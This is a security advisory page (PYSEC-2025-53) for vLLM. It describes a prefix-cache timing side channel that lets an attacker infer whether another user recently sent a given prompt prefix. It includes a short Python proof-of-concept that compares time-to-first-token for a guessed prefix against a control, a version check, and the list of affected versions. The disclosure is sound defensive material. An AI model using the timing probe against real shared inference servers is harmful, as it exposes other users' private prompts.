PYSEC-2025-53

Import Source: https://github.com/pypa/advisory-database/blob/main/vulns/vllm/PYSEC-2025-53.yaml
JSON Data: https://api.osv.dev/v1/vulns/PYSEC-2025-53
Aliases:
Published: 2025-05-29T17:15:21Z
Modified: 2025-06-26T21:44:36.898654Z
Summary: [none]
Details

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PagedAttention mechanism finds a matching prefix chunk in its cache, the prefill phase speeds up, and the speedup is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are large enough to be measured, giving an attacker a timing side channel for inferring whether a given prefix has recently been processed, for example as part of another user's prompt. This issue has been patched in version 0.9.0.
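The timing difference can be observed end to end by comparing TTFT across requests. Below is a minimal sketch of the measurement, assuming a vLLM server with prefix caching enabled is serving the OpenAI-compatible completions API at http://localhost:8000; the URL, model name, and prompts are illustrative assumptions, not values from the advisory.

    import time
    import requests

    API_URL = "http://localhost:8000/v1/completions"  # assumed local vLLM server
    MODEL = "my-model"                                # placeholder model name

    def time_to_first_token(prompt: str) -> float:
        """Stream a completion and return the elapsed time to the first token."""
        start = time.perf_counter()
        with requests.post(
            API_URL,
            json={"model": MODEL, "prompt": prompt, "max_tokens": 1, "stream": True},
            stream=True,
            timeout=30,
        ) as resp:
            resp.raise_for_status()
            for line in resp.iter_lines():
                if line:  # first non-empty streamed line marks the first token
                    return time.perf_counter() - start
        return float("inf")

    # A prompt whose prefix is already cached (e.g. recently submitted by
    # another user) finishes prefill faster, so its TTFT is measurably lower.
    candidate = "Guessed prefix the attacker wants to confirm. Continue:"
    control = "Random never-seen prefix of similar length. Continue:"
    print("candidate TTFT:", time_to_first_token(candidate))
    print("control TTFT:  ", time_to_first_token(control))

A consistently lower candidate TTFT across repeated trials indicates a prefix-cache hit, which is the signal this advisory describes.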

References

Affected packages

Package: PyPI / vllm

Affected ranges:

  Type: GIT
  Repo: https://github.com/vllm-project/vllm
  Events:
    Introduced: 0 (unknown introduced commit; all previous commits are affected)
    Fixed:

  Type: ECOSYSTEM
  Events:
    Introduced: 0 (unknown introduced version; all previous versions are affected)
    Fixed: 0.9.0
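To act on the ECOSYSTEM range above (introduced at 0, fixed in 0.9.0), a deployment can compare its installed release against the patched version. A minimal sketch, assuming vllm is installed and the third-party packaging library is available; the printed messages are illustrative:

    from importlib.metadata import version
    from packaging.version import Version

    installed = Version(version("vllm"))
    if installed < Version("0.9.0"):
        # All versions below 0.9.0 fall inside the affected range above.
        print(f"vllm {installed} is affected by PYSEC-2025-53; upgrade to >= 0.9.0")
    else:
        print(f"vllm {installed} includes the fix for PYSEC-2025-53")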

Affected versions

0.*

0.0.1
0.1.0
0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.1.7
0.2.0
0.2.1
0.2.1.post1
0.2.2
0.2.3
0.2.4
0.2.5
0.2.6
0.2.7
0.3.0
0.3.1
0.3.2
0.3.3
0.4.0
0.4.0.post1
0.4.1
0.4.2
0.4.3
0.5.0
0.5.0.post1
0.5.1
0.5.2
0.5.3
0.5.3.post1
0.5.4
0.5.5
0.6.0
0.6.1
0.6.1.post1
0.6.1.post2
0.6.2
0.6.3
0.6.3.post1
0.6.4
0.6.4.post1
0.6.5
0.6.6
0.6.6.post1
0.7.0
0.7.1
0.7.2
0.7.3
0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.8.5.post1